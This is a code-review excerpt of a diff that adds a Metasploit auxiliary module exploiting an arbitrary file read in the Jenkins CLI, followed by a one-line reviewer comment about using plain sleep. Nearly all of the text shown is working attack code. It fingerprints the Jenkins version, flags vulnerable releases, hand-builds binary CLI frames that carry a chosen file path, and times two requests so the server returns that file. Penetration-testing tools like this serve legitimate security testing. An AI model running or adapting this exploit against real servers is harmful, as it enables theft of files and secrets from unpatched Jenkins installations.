modules/auxiliary/gather/jenkins_cli_ampersand_arbitrary_file_read.rb

```diff
@@ -0,0 +1,300 @@
+      [
+        OptFloat.new('DELAY', [true, 'Delay between first and second request', 0.5]),
+        OptString.new('ENCODING', [true, 'Encoding to use for reading the file', 'UTF-8']),
+        OptString.new('LOCALITY', [true, 'Locality to use for reading the file', 'en_US'])
+      ]
+    )
+  end
+
+  # Returns the Jenkins version. taken from jenkins_cred_recovery.rb, upgraded to work with newer versions
+  #
+  # @return [String] Jenkins version.
+  # @return [NilClass] No Jenkins version found.
+  def get_jenkins_version
+    uri = normalize_uri(target_uri.path)
+    res = send_request_cgi({ 'uri' => uri })
+
+    unless res
+      fail_with(Failure::Unknown, 'Connection timed out while finding the Jenkins version')
+    end
+
+    # shortcut for new versions such as 2.426.2 and 2.440
+    return res.headers['X-Jenkins'] if res.headers['X-Jenkins']
+
+    html = res.get_html_document
+    version_attribute = html.at('body').attributes['data-version']
+    version = version_attribute ? version_attribute.value : ''
+    version.scan(/jenkins-([\d.]+)/).flatten.first
+  end
+
+  def check
+    version = get_jenkins_version
+
+    return Exploit::CheckCode::Safe('Unable to determine Jenkins version number') if version.nil? || version.blank?
+
+    version = Rex::Version.new(version)
+
+    if version <= Rex::Version.new('2.426.2') || # LTS check
+       (version >= Rex::Version.new('2.427') && version <= Rex::Version.new('2.441')) # non-lts
+      return Exploit::CheckCode::Appears("Found exploitable version: #{version}")
+    end
+
+    Exploit::CheckCode::Safe("Found non-exploitable version: #{version}")
+  end
+
+  def request_header
+    "\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00"
+  end
+
+  def request_footer
+    data = []
+    data << "\x00\x00\x00\x07\x02\x00"
+    data << [datastore['ENCODING'].length].pack('C') # length of encoding string
+    data << datastore['ENCODING']
+    data << "\x00\x00\x00\x07\x01\x00"
+    data << [datastore['LOCALITY'].length].pack('C') # length of locality string
+    data << datastore['LOCALITY']
+    data << "\x00\x00\x00\x00\x03"
+    data
+  end
+
+  def parameter_one
+    # a literal parameter of 1
+    "\x03\x00\x00\x01\x31\x00\x00\x00"
+  end
+
+  def data_generator(pad: false)
+    data = []
+    data << request_header
+    data << parameter_one if pad == true
+    data << [datastore['FILE_PATH'].length + 3].pack('C').to_s
+    data << "\x00\x00"
+    data << [datastore['FILE_PATH'].length + 1].pack('C').to_s
+    data << "\x40"
+    data << datastore['FILE_PATH']
+    data << request_footer
+    data.join('')
+  end
+
+  def upload_request(uuid, multi_line_file: true)
+    # send upload request asking for file
+
+    # In testing against Docker image on localhost, .01 seems to be the magic to get the download request to hit very slightly ahead of the upload request
+    # which is required for successful exploitation
+    Rex::ThreadSafe.sleep(datastore['DELAY'])
```

Comment:
You can just call `sleep`, you don't need to use `Rex::ThreadSafe.sleep` any more.